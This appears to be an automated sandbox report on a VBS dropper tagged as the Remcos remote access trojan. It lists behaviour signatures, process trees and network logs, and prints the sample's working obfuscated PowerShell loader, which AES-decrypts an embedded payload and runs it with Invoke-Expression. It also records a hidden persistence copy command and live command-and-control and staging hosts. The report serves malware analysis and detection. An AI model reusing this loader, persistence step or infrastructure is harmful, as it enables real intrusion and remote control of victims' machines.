Malware Analysis Report

2025-06-16 01:18

Sample ID 231205-xagexsea8s
Target envifa.vbs
SHA256 043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
Tags
remcos remotehost rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401

Threat Level: Known bad

The file envifa.vbs was found to be: Known bad.

Malicious Activity Summary

remcos remotehost rat

Remcos

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-05 18:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win7-20231023-en

Max time kernel

117s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

Network

N/A

Files

memory/2992-4-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

memory/2992-7-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2992-6-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-5-0x000000001B1A0000-0x000000001B482000-memory.dmp

memory/2992-8-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

memory/2992-10-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-9-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-11-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-12-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-13-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win10-20231025-en

Max time kernel

290s

Max time network

295s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2916 set thread context of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 2916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1332 wrote to memory of 2916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 2916 wrote to memory of 3172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = 'k8qwzV8P21gGtVOd7SAXmfQRh03MJ8Ged4nJeFFrdUwM2fadaBY/VhUNeySTG+oRhJ9e56m8gBh4H+lvV3bGt5/4/STem83phMPT5OiQ1pJCN7POF3qxkETdQB1FBgemfV/Sb5PgEuhjs+4iar71WgBaMwmf0egTMyDORL3mT8ucIk/Tro4TtYXBtNVzQnKSKybtqfPKA4qjsO4Rxg3JhxINiAwILViH1c/eV5ymyCnUye5q3UBG5U/M/HtIEHiJEzRqK7TvGFqMXJLPSFhYoQSsEJ6QRBfrnKoYlWSi3+iwj5b1hYRSTnCIuEr7l0jt17vlkvrfq/GatFniAvDUg8SwY98T2yvAl6j1L+2KOg6rnY9odExu2H4pBKVXyD5i6vI7mFEP7RWmE36WXZKeulXG7ZiX5L82vA1uPpnHGC9qpq7YadP/1pxZUt+/Duv0rti0jdyjKVBZiwK+DeIhSGnrQaF7tTREeBIITWLarMrwnlvyXwORDEMWFo61NzGUQoh9DNOfFFrjALQoJdh4V6fqhUUBECbhpY8syBN12l2pDXF/+COo5yyN7yYND0d3rP6M7ZTzdUFJ0wcoZGFiB0K1DQPh+e6k2EvRlSfPhkLfO9LpdCv3JMgTEahtfb0jgmDzX1sq3ZHyXHy/zTaoRRuAtjktJPQVhTZOopGXv6Xak5FmtZF4KN6HWt41P2kAeuMGCfXRA71xIiv/ZZa5w6TUs0e4mVj+mtKoph2m0shsuvBEGPsBYfbT+l4AqEsPi6bV47Yml1bm22e/iBcrEY5CvgLbuNVwDN881rO2/EzWh3b3buHpTW8OKWdXY//WbmNiKiErwSITIYqAs/yvZHgtx62BtfqzrtS3CHGzmP2ziY0sAGmlQl7f7xoC+6Pz0fqO/s3fgOv0Ti9TiZIlzOv/5aOHwZXtFeWHOEMthan8J/261I9yW9JWGdc42XVOnr04TuITT6m7d8t+02s1ftDwrPTUXdLfZvXxvwNR8Qpm8LquSwMajLiDrn1gpBLficCnjZlh7bZVW6vsjpLDhGQU8xjPTJwz3hRlq1lR7Ddi/op236ZEEiAPW+ulcm/W128KYkg/8CsfbDGsZoopcwKClQRDk2jVUuy3kAnz4o3fSTpt8UTWmua6l2q6S37Hyk6Dh14U06Ih4qxL6QAi9jV9XT3AyHOdzT7cYTopKGn9Jpa847OqUI/ixnyXdRr07jxmCR9JC0ZcxGLe0/6dWZqmj/hSOOaoLB6G3iLHuo9pXMQ6QE3Iwk6+uigKC+q6AWNRkz2yI1Ms7mgylxYJLmjCR3urwbGQRdz5SQNwYIY435VyYp7PNEEYDH1Su164ceW2UyoIAVdlI9h6lMfCRWS32zFWnTfw7X5u1ASMdpZPjITVPrKgN3st4K4Okg38K6fAkOZMFzIK/rPiHN1jMEvLn2lNcSj53sWoxCdJcDZEJxbIxCbg258lVibR8l4mea9/Gm1Du4honGCCOQ04OrLgDjcjUFHm6IPapDXlXXlO3qLShW2WkTBVLNmo2mCyb3Khg8tg1HNmypVIRH9bYbWNq5PwLiE4i0gRO8zpFbtoyvZ4A1LUdLmR6gEriE4mjChgL4kT0stuG8d4RpNeIhdxAQjEu1G3UUA5+JusNv5I03apj3rG0awF+5Fx2p61XY83VNbUu6pPOFL08zV64IDK6PaPi7zJ92FbkSYiPjloT8S23k3G/lw6Iw8l1dfmpEC6tRhGoOuqFN1QWwUf8ietmQoZ7aG+vk0Dp5MaHcgSqpAFIudPkgx2UPM8/PCAHw9dlm4H1gLBMSPQxiWhjfFpCF1+DPZDVNt5csuwhqr5gz6O3oLoXvqR+Y5Qpen0ZijFlIsD/sCyFa6ia7R8yT7eAzqAYqaTCuTNVBIuu4/i7tMEJBDytK1XZvwnuwn8urP3S0I3goQmUlECx6iUkg+3bOTTYzXHFbDHP5Mq2zQLnyiHUV38V5PRcY9BL/ByuJlLdILx1lWIglQPsmHUXr2P9jd3Sl9bnql2F8rP4a7XY65ORGh2uRpjBO5TO7lVKdLbzyfU20BSjwv5PyYH57NcYkpzXfNnWxNUsWryAvk=';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 188.114.97.0:443 paste.ee tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 155.162.142.181.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 155.162.142.181.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 13.73.50.20.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 128.99.217.23.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
